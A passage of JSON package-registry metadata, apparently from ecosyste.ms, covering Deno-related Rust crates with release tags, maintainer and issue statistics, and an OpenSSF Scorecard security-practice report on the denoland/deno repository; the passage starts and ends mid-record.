d_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T17:16:19.447Z","dependent_packages_count":1,"downloads":4580,"downloads_period":"total","dependent_repos_count":1,"rankings":{"downloads":36.13547592605184,"dependent_repos_count":16.690734510263486,"dependent_packages_count":18.15597474766567,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":null,"average":14.208525006999352},"purl":"pkg:cargo/deno_3p_lib","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_3p_lib","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_3p_lib","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_3p_lib/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_3p_lib/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_3p_lib/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_3p_lib/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_3p_lib/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_3p_lib/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_3p_lib/codemeta","maintainers":[{"uuid":"93727","login":"Lispython","name":"Alexandr","email":null,"url":"https://github.com/Lispython","packages_count":9,"html_url":"https://crates.io/users/Lispython","role":null,"created_at":"2022-11-07T18:29:18.808Z","updated_at":"2022-11-07T18:29:18.808Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/Lispython/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":13674634,"name":"deno_node_crypto","ecosystem":"cargo","description":"Node crypto compatibility for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":28,"first_release_published_at":"2026-02-12T15:04:12.919Z","latest_release_published_at":"2026-08-27T15:21:19.698Z","latest_release_number":"0.28.0","last_synced_at":"2026-09-07T22:58:59.470Z","created_at":"2026-02-12T15:17:52.045Z","updated_at":"2026-09-07T22:58:59.470Z","registry_url":"https://crates.io/crates/deno_node_crypto/","install_command":"cargo install deno_node_crypto","documentation_url":"https://docs.rs/deno_node_crypto/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits 